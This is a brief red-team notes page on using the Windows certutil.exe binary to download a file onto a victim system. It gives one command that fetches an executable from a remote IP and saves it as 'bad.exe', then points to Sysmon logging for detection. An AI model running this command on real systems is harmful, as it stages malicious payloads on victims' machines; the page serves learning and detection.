Red Team Notes
linkedintwitterpatreongithub
Search
K
Links
Comment on page

Downloading Files with Certutil

Downloading additional files to the victim system using native OS binary.

Execution

certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe

Observations

Sysmon commandling logging is a good place to start for monitoring suspicious certutil.exe behaviour:
Previous
Encode/Decode Data with Certutil
Next
Packed Binaries
Last modified 5yr ago